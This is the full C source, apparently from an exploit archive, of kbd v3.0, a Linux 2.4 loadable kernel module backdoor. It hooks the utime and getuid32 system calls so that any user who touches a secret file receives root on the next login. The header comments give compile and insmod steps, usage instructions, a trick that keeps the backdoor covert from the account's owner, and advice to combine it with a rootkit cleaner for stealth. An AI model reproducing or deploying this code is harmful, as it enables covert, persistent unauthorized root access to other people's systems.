Kbd v3.0 is a Linux loadable kernel module backdoor. Allows root access by modifying the SYS_utime and SYS_getuid32 system calls. Can be used in conjunction with cleaner.c from the adore root for stealth capability.
1e01acc4b6519e04281fd7a9cbecefe015e166620e9d670ffc0d78520451a2d7
/* kbd - Linux loadable kernel module backdoor */
/* 6.21.01 spaceork@dhp.com */
/* */
/* Version 3.0 (kbdv3.c) for Linux 2.4.X */
/* Tested on Linux 2.4.5 */
/* */
/* compile: host:~# gcc -c -O2 kbdv2.c */
/* */
/* add(as root): host:~# insmod kbdv2.o */
/* remove(as root): host:~# rmmod kbdv2.o */
/* */
/* Usage notes: */
/* kbd is a nice little backdoor that allows root access by */
/* modifing the SYS_utime and SYS_getuid32 system calls. */
/* Usage after insmod is fairly strait forward: */
/* 1. login as a normal user */
/* 2. host:~$ touch foobar */
/* 3. login again under the *same* username */
/* 4. the second login session will be given root privileges */
/* host:~# id */
/* uid=0(root) gid=0(root) groups=100(users) */
/* 5. Remember to repeat this procedure everytime you plan on */
/* using the backdoor. To keep this covert, the special uid */
/* resets after root is given out, this prevents the */
/* legitimate owner of the account from receiving a */
/* suspicious root shell when he/she logs in. */
/* */
/* Note: If you want stealth capability, I recommend using kbd */
/* in conjunction with cleaner.c from the adore rootkit */
/* by stealth (http://spider.scorpions.net/~stealth) */
#define MODULE
#define __KERNEL__
#include <syscall.h>
#include <asm/uaccess.h>
#include <linux/module.h>
#include <linux/modversions.h>
#include <linux/unistd.h>
#include <linux/utime.h>
#include <linux/version.h>
#include <linux/sched.h>
#include <linux/mm.h>
#define FILE_NAME "foobar" /* change to whatever you wish */
extern void *sys_call_table[];
/* system calls we will replace */
int (*orig_utime)(const char *filename, struct utimbuf *buf);
int (*orig_getuid32)();
int u;
int bd_utime(const char *filename, struct utimbuf *buf)
{
int tmp;
char *k_pathname;
char name[] = FILE_NAME;
/* copy to kernel space */
k_pathname = (char*) kmalloc(256, GFP_KERNEL);
copy_from_user(k_pathname, filename, 255);
/* Is the pathname our secret one? If so make the current uid special. */
if (strstr(k_pathname, (char*)&name) != NULL)
u = current->uid;
tmp = (*orig_utime)(filename, buf);
return tmp;
}
int bd_getuid32()
{
int tmpp;
/* Give root to the special uid, then reset the value of u. */
if (current->uid == u)
{
current->uid = 0;
current->euid = 0;
current->gid = 0;
current->egid = 0;
u = 55555; /* change if this bothers you */
return 0;
}
tmpp = (*orig_getuid32) ();
return tmpp;
}
int init_module(void) /* setup the module */
{
orig_utime = sys_call_table[SYS_utime];
orig_getuid32 = sys_call_table[SYS_getuid32];
sys_call_table[SYS_utime] = bd_utime;
sys_call_table[SYS_getuid32] = bd_getuid32;
return 0;
}
void cleanup_module(void) /* shutdown the module */
{
sys_call_table[SYS_utime] = orig_utime;
sys_call_table[SYS_getuid32] = orig_getuid32;
}